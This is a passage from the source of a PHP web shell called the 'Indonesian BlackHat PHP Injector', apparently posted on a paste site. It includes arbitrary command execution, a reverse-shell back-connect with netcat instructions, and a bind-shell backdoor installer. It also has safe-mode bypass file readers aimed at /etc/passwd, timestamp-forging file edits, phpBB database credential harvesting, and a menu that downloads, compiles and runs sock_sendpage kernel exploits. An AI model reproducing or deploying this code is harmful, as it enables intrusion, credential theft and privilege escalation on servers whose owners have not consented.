  2518.    $fi = fopen($d.$f,"rb");
  2519.    if ($fi)
  2520.    {
  2521.     if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f)); } else {
  2522.     echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2523.     $n = 0;
  2524.     $a0 = "00000000<br />";
  2525.     $a1 = "";
  2526.     $a2 = "";
  2527.     for ($i=0; $i<strlen($str); $i++)
  2528.     {
  2529.      $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2530.      switch (ord($str[$i]))
  2531.      {
  2532.       case 0:  $a2 .= "<font>0</font>"; break;
  2533.       case 32:
  2534.       case 10:
  2535.       case 13: $a2 .= "&nbsp;"; break;
  2536.       default: $a2 .= htmlspecialchars($str[$i]);
  2537.      }
  2538.      $n++;
  2539.      if ($n == $hexdump_rows)
  2540.      {
  2541.       $n = 0;
  2542.       if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2543.       $a1 .= "<br>";
  2544.       $a2 .= "<br>";
  2545.      }
  2546.     }
  2547.     //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br />";}
  2548.     echo "<table border=0 bgcolor=transparent cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=transparent>".$a2."</td></tr></table><br />";
  2549.    }
  2550.    $encoded = "";
  2551.    if ($base64 == 1)
  2552.    {
  2553.     echo "Base64 Encode<br>";
  2554.     $encoded = base64_encode(file_get_contents($d.$f));
  2555.    }
  2556.    elseif($base64 == 2)
  2557.    {
  2558.     echo "Base64 Encode + Chunk<br>";
  2559.     $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2560.    }
  2561.    elseif($base64 == 3)
  2562.    {
  2563.     echo "Base64 Encode + Chunk + Quotes<br>";
  2564.     $encoded = base64_encode(file_get_contents($d.$f));
  2565.     $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2566.    }
  2567.    elseif($base64 == 4)
  2568.    {
  2569.     $text = file_get_contents($d.$f);
  2570.     $encoded = base64_decode($text);
  2571.     echo "Base64 Decode";
  2572.     if (base64_encode($encoded) != $text) {echo " (failed)";}
  2573.     echo "<br>";
  2574.    }
  2575.    if (!empty($encoded))
  2576.    {
  2577.     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2578.    }
  2579.    echo "HEXDUMP:<nobr> [<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br />Base64:  
  2580. <nobr>[<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr>
  2581. <nobr>[<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr>
  2582. <nobr>[<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr>
  2583. <nobr>[<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr>
  2584. <P>";
  2585.   }
  2586.   elseif ($ft == "html")
  2587.   {
  2588.    if ($white) {@ob_clean();}
  2589.    echo $r;
  2590.    if ($white) {TuXexit();}
  2591.   }
  2592.   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  2593.   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  2594.   elseif ($ft == "phpsess")
  2595.   {
  2596.    echo "<pre>";
  2597.    $v = explode("|",$r);
  2598.    echo $v[0]."<br>";
  2599.    var_dump(unserialize($v[1]));
  2600.    echo "</pre>";
  2601.   }
  2602.   elseif ($ft == "exe")
  2603.   {
  2604.    $ext = explode(".",$f);
  2605.    $c = count($ext)-1;
  2606.    $ext = $ext[$c];
  2607.    $ext = strtolower($ext);
  2608.    $rft = "";
  2609.    foreach($exeftypes as $k=>$v)
  2610.    {
  2611.     if (in_array($ext,$v)) {$rft = $k; break;}
  2612.    }
  2613.    $cmd = str_replace("%f%",$f,$rft);
  2614.    echo "Execute file:<form action=\"".$surl."\" method=POST><input type=hidden name=xtux value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  2615.   }
  2616.   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  2617.   elseif ($ft == "code")
  2618.   {
  2619.    if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
  2620.    {
  2621.     $arr = explode("\n",$r);
  2622.     if (count($arr == 18))
  2623.     {
  2624.      include($d.$f);
  2625.      echo "phpBB configuration is detected in this file!<br>";
  2626.      if ($dbms == "mysql4") {$dbms = "mysql";}
  2627.      if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><u>Connect to DB</u></a><br><br>";}
  2628.      else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by TuXell. Please, report us for fix.";}
  2629.      echo "Parameters for manual connect:<br>";
  2630.      $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  2631.      foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2632.      echo "<hr size=\"1\" noshade>";
  2633.     }
  2634.    }
  2635.    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  2636.    if (!empty($white)) {@ob_clean();}
  2637.    highlight_file($d.$f);
  2638.    if (!empty($white)) {TuXexit();}
  2639.    echo "</div>";
  2640.   }
  2641.   elseif ($ft == "download")
  2642.   {
  2643.    @ob_clean();
  2644.    header("Content-type: application/octet-stream");
  2645.    header("Content-length: ".filesize($d.$f));
  2646.    header("Content-disposition: attachment; filename=\"".$f."\";");
  2647.    echo $r;
  2648.    exit;
  2649.   }
  2650.   elseif ($ft == "notepad")
  2651.   {
  2652.    @ob_clean();
  2653.    header("Content-type: text/plain");
  2654.    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2655.    echo($r);
  2656.    exit;
  2657.   }
  2658.   elseif ($ft == "img")
  2659.   {
  2660.    $inf = getimagesize($d.$f);
  2661.    if (!$white)
  2662.    {
  2663.     if (empty($imgsize)) {$imgsize = 20;}
  2664.     $width = $inf[0]/100*$imgsize;
  2665.     $height = $inf[1]/100*$imgsize;
  2666.     echo "<center>Size:&nbsp;";
  2667.     $sizes = array("100","50","20");
  2668.     foreach ($sizes as $v)
  2669.     {
  2670.      echo "<a href=\"".$surl."xtux=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  2671.      if ($imgsize != $v ) {echo $v; } else {
  2672.     echo "<u>".$v."</u>";}
  2673.      echo "</a>&nbsp;&nbsp;&nbsp;";
  2674.     }
  2675.     echo "<br><br><img src=\"".$surl."xtux=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  2676.     } else {
  2677.     @ob_clean();
  2678.     $ext = explode($f,".");
  2679.     $ext = $ext[count($ext)-1];
  2680.     header("Content-type: ".$inf["mime"]);
  2681.     readfile($d.$f);
  2682.     exit;
  2683.    }
  2684.   }
  2685.   elseif ($ft == "edit")
  2686.   {
  2687.    if (!empty($submit))
  2688.    {
  2689.     if ($filestealth) {$stat = stat($d.$f);}
  2690.     $fp = fopen($d.$f,"w");
  2691.     if (!$fp) {echo "Can't write to file!"; } else {
  2692.      echo "Saved!";
  2693.      fwrite($fp,$edit_text);
  2694.      fclose($fp);
  2695.      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2696.      $r = $edit_text;
  2697.     }
  2698.    }
  2699.    $rows = count(explode("\r\n",$r));
  2700.    if ($rows < 10) {$rows = 10;}
  2701.    if ($rows > 30) {$rows = 30;}
  2702.    echo "<form action=\"".$surl."xtux=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."xtux=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; } elseif (!empty($ft)) {echo "<center>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</center>"; } else {
  2703. echo "<center>Unknown extension (".$ext."), please, select type manually.</center>";}
  2704.  }
  2705. }
  2706. } else {
  2707.  @ob_clean();
  2708.  $images = array(
  2709. "0x99b"=>"",
  2710. "arrow_ltr"=>"","back"=>"","buffer"=>"","change"=>"","delete"=>"","download"=>"","forward"=>"",
  2711. "home"=>"","mode"=>"","refresh"=>"","search"=>"","setup"=>"","small_dir"=>"",
  2712. "small_unk"=>"","multipage"=>"","sort_asc"=>"","sort_desc"=>"","sql_button_drop"=>"",
  2713. "sql_button_empty"=>"","sql_button_insert"=>"","up"=>"","write"=>"","ext_asp"=>"","ext_mp3"=>"",
  2714. "ext_avi"=>"","ext_cgi"=>"","ext_cmd"=>"","ext_cpp"=>"","ext_ini"=>"","ext_diz"=>"",
  2715. "ext_doc"=>"","ext_exe"=>"","ext_h"=>"","ext_hpp"=>"","ext_htaccess"=>"",
  2716. "ext_html"=>"","ext_jpg"=>"","ext_js"=>"","ext_lnk"=>"","ext_log"=>"","ext_php"=>"",
  2717. "ext_pl"=>"","ext_swf"=>"","ext_tar"=>"","ext_txt"=>"","ext_wri"=>"","ext_xml"=>""
  2718. );
  2719.  //For simple size- and speed-optimization.
  2720.  $imgequals = array(
  2721.   "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  2722.   "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  2723.   "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  2724.   "ext_html"=>array("ext_html","ext_htm"),
  2725.   "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  2726.   "ext_lnk"=>array("ext_lnk","ext_url"),
  2727.   "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  2728.   "ext_doc"=>array("ext_doc","ext_dot"),
  2729.   "ext_js"=>array("ext_js","ext_vbs"),
  2730.   "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  2731.   "ext_wri"=>array("ext_wri","ext_rtf"),
  2732.   "ext_swf"=>array("ext_swf","ext_fla"),
  2733.   "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  2734.   "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  2735.  );
  2736.  if (!$getall)
  2737.  {
  2738.   header("Content-type: image/gif");
  2739.   header("Cache-control: public");
  2740.   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  2741.   header("Cache-control: max-age=".(60*60*24*7));
  2742.   header("Last-Modified: ".date("r",filemtime(__FILE__)));
  2743.   foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  2744.   if (empty($images[$img])) {$img = "small_unk";}
  2745.   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  2746.   echo base64_decode($images[$img]); } else {
  2747.   foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  2748.   natsort($images);
  2749.   $k = array_keys($images);
  2750.   echo  "<center>";
  2751.   foreach ($k as $u) {echo $u.":<img src=\"".$surl."xtux=img&img=".$u."\" border=\"1\"><br>";}
  2752.   echo "</center>";
  2753.  }
  2754.  exit;
  2755. }
  2756. if ($xtux == "about") {echo "<center>Indonesian BlackHat PHP Injector<br /><br />Black Hat Edition<br />This is for education purpose only<br />";}
  2757. if ($xtux == "backc")
  2758. {
  2759.  $ip = $_SERVER["REMOTE_ADDR"];
  2760.  $msg = $_POST['backcconnmsg'];
  2761.  $emsg = $_POST['backcconnmsge'];
  2762.  echo("<center>Back-Connection:</br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=31337> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run 'nc -l -n -v -p 31337'<br><br></center>");
  2763.  echo("$msg");
  2764.  echo("$emsg");
  2765. }
  2766.  
  2767. if ($xtux == "shbd"){
  2768. $msg = $_POST['backcconnmsg'];
  2769. $emsg = $_POST['backcconnmsge'];
  2770. echo("<center>Bind Shell Backdoor<br /><br /><form name=form method=POST>Bind Port: <input type='text' name='backconnectport' value='31337'><input type='hidden' name='use' value='shbd'>
  2771. <input type='submit' value='Install Backdoor'></form>");
  2772. echo("$msg");
  2773. echo("$emsg");
  2774. echo("</center>");
  2775. } ?>
  2776. </td></tr></table><a bookmark="minipanel"><br>
  2777. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=3 height="1" width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1>
  2778. <tr><td width="100%" height="1" valign="top" colspan="2"></td></tr>
  2779. <tr><td width="50%" height="1" valign="top"><center>Command: <form action="<?php echo $surl; ?>"><input type=hidden name=xtux value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>">
  2780. <input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>">
  2781. <input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE><br>
  2782. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=3 height="116" width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1>
  2783. <tr><td height="1" valign="top" colspan="2"></td></tr>
  2784. <tr><td width="50%" height="83" valign="top"><center><div align="center">Useful Commands</div>
  2785.     <form action="<?php echo $surl; ?>"><div align="center"><input type=hidden name=xtux value="cmd">
  2786.         <input type=hidden name="d" value="<?php echo $dispd; ?>">
  2787. <SELECT NAME="cmd">
  2788.     <OPTION VALUE="uname -a">Kernel version
  2789.     <OPTION VALUE="w">Logged in users
  2790.     <OPTION VALUE="lastlog">Last to connect
  2791.     <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
  2792.     <OPTION VALUE="netstat -atup | grep IST">Open ports
  2793.     <OPTION VALUE="gcc -v">gcc version
  2794.     <OPTION VALUE="perl -v">perl version
  2795.     <OPTION VALUE="wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c">sock_sendpage Exploit 6
  2796.     <OPTION VALUE="gcc -Wall 36038-6.c -o 36038-6">Compile sock_sendpage Exploit 6
  2797.     <OPTION VALUE="./36038-6">Run sock_sendpage Exploit 6
  2798.     <OPTION VALUE="wget http://www.securityfocus.com/data/vulnerabilities/exploits/36038-5.c">sock_sendpage Exploit 5
  2799.     <OPTION VALUE="gcc 36038-5.c -o 36038-5">Compile sock_sendpage Exploit 5
  2800.     <OPTION VALUE="./36038-5">Run sock_sendpage Exploit 5
  2801. </SELECT>
  2802.     <input type=hidden name="cmd_txt" value="1">&nbsp;
  2803.         <input type=submit name=submit value="Execute"><br>Kernel akan diberi tau jika melebihi kapasitas</div></form></td>
  2804.     <td width="50%" height="1" valign="top"><center>Select: <form action="<?php echo $surl; ?>xtux=cmd" method="POST">
  2805.     <input type=hidden name=xtux value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE><br>
  2806. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=5 height="116" width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1>
  2807. <tr><td height="1" valign="top" colspan="2"></td></tr>
  2808. <tr><td width="50%" height="83" valign="top"><center><div align="center">Php Safe-Mode Bypass (Read Files)</div><br>
  2809. <form action="<?php echo $surl; ?>"><div align="center">File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br>Contoh /etc/passwd<br>
  2810. <?
  2811. function rsg_read()
  2812. {    
  2813. $test="";
  2814. $temp=tempnam($test, "cx");
  2815. $file=$_GET['file'];    
  2816. $get=htmlspecialchars($file);
  2817. echo "<br>Trying To Get File <font color=#000099>$get</font><br>";
  2818. if(copy("compress.zlib://".$file, $temp)){
  2819. $fichier = fopen($temp, "r");
  2820. $xtuxion = fread($fichier, filesize($temp));
  2821. fclose($fichier);
  2822. $source=htmlspecialchars($xtuxion);
  2823. echo "<div class=\"shell\">Start $get<br><br><font color=\"white\">$source</font><br><br>Fin <font color=#000099>$get</font>";
  2824. unlink($temp); } else { die("<FONT COLOR=\"RED\"><CENTER>Access ".htmlspecialchars($file)." denied.</CENTER></FONT>"); }
  2825. echo "</div>";
  2826. }
  2827. if(isset($_GET['file']))
  2828. {
  2829. rsg_read();
  2830. }
  2831. ?>
  2832. <?
  2833. function rsg_glob()
  2834. {
  2835. $chemin=$_GET['directory'];
  2836. $files = glob("$chemin*");
  2837. echo "Trying To List Folder <font color=#000099>$chemin</font><br>";
  2838. foreach ($files as $filename) {
  2839. echo "<pre>";
  2840. echo "$filename\n";
  2841. echo "</pre>";
  2842. }
  2843. }
  2844. if(isset($_GET['directory']))
  2845. {
  2846. rsg_glob();
  2847. }
  2848. ?>
  2849. <br></div></form></td><td width="50%" height="83" valign="top"><center><center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"><div align="center"><br>Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br></form></center></td></tr></TABLE>
  2850. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=5 height="1" width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=xtux value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td><td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=xtux value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td></tr></table>
  2851. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=5 height="1" width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=xtux value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=xtux value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
  2852. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#990000 cellPadding=5 height="1" width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=xtux value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=xtux value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
  2853. <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#990000 cellPadding=0 width="95%" bgcolor=transparent borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p id="footer"> Black Hat &reg; &#47;&#47; Source by &copy; <a href="http://indonesianblackhat.web.id/">Indonesian BlackHat</a> &#47;&#47; <? echo date ("Y")." "; ?> <a href="mailto:ceemde@yahoo.com">Dont Trust Everyone</a> &#8482;</font> </p></td></tr></table></body></html><?php chdir($lastdir); TuXexit(); exit;
Add Comment
Please, Sign In to add comment